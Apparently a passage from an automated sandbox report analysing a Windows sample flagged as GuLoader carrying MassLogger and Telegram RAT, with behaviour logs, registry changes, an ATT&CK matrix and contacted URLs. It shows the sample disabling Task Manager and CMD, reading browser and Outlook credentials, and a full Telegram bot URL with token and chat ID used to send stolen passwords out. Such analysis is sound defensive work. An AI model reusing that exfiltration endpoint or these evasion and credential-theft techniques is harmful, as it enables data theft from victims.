            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596707Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596534Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596257Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594592Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594375Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeWindow / User API: threadDelayed 2265Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeWindow / User API: threadDelayed 7582Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI coverage: 3.6 %
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2968Thread sleep count: 2265 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2968Thread sleep count: 7582 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -597016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596707s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596534s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596391s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596257s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595141s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -595031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -594922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -594812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -594703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -594592s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -594484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exe TID: 2984Thread sleep time: -594375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00402868 FindFirstFileW,3_2_00402868
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_0040672B FindFirstFileW,FindClose,3_2_0040672B
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 3_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405AFA
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597344Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597234Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597125Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596707Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596534Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596391Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596257Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596141Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595922Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595469Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595359Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595250Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595141Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 595031Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594922Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594812Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594703Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594592Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594484Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeThread delayed: delay time: 594375Jump to behavior
            Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000526B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWe
            Source: rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000526B000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005200000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI call chain: ExitProcess graph end nodegraph_0-4589
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeAPI call chain: ExitProcess graph end nodegraph_0-4746
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_70091B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70091B5F
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeProcess created: C:\Users\user\Desktop\rXKfKM0T49.exe "C:\Users\user\Desktop\rXKfKM0T49.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Users\user\Desktop\rXKfKM0T49.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeCode function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Disable Task Manager(disabletaskmgr)
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Disables CMD prompt
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRegistry value created: DisableCMD 1Jump to behavior
            Disables the Windows task manager (taskmgr)
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\rXKfKM0T49.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected MassLogger RAT
            Source: Yara matchFile source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rXKfKM0T49.exe PID: 1072, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		31
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Access Token Manipulation            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory215
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
            Process Injection            		2
            Obfuscated Files or Information            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		21
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading            		NTDS21
            Security Software Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets31
            Virtualization/Sandbox Evasion            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
            Virtualization/Sandbox Evasion            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Access Token Manipulation            		DCSync1
            System Network Configuration Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rXKfKM0T49.exe75%VirustotalBrowse
            rXKfKM0T49.exe78%ReversingLabsWin32.Trojan.GuLoader
            rXKfKM0T49.exe100%AviraHEUR/AGEN.1337946

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nspC239.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://api.telegram.orgL0%Avira URL Cloudsafe
            http://checkip.dyndn0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		216.58.206.46
            		truefalse
              		high
              drive.usercontent.google.com
              		142.250.181.225
              		truefalse
                		high
                reallyfreegeoip.org
                		104.21.96.1
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          		high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            		high
                            https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189false
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comrXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.usercontent.google.com/#&rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.telegram.orgrXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359C8000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035B71000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000358FF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035AE6000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003596B000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003583C000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035827000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.000000003592A000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.org/botrXKfKM0T49.exe, 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://translate.google.com/translate_a/element.jsrXKfKM0T49.exe, 00000003.00000003.1922928431.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000003.1922862011.0000000005282000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.google.com/rXKfKM0T49.exe, 00000003.00000002.2628850496.0000000005200000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.orgLrXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://reallyfreegeoip.org/xml/8.46.123.189ecrXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.telegramrXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035BBF000.00000004.00000800.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2649955801.00000000359B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://reallyfreegeoip.orgrXKfKM0T49.exe, 00000003.00000002.2649955801.0000000035791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://drive.usercontent.google.com/rXKfKM0T49.exe, 00000003.00000003.1959880913.0000000005282000.00000004.00000020.00020000.00000000.sdmp, rXKfKM0T49.exe, 00000003.00000002.2628850496.000000000527B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
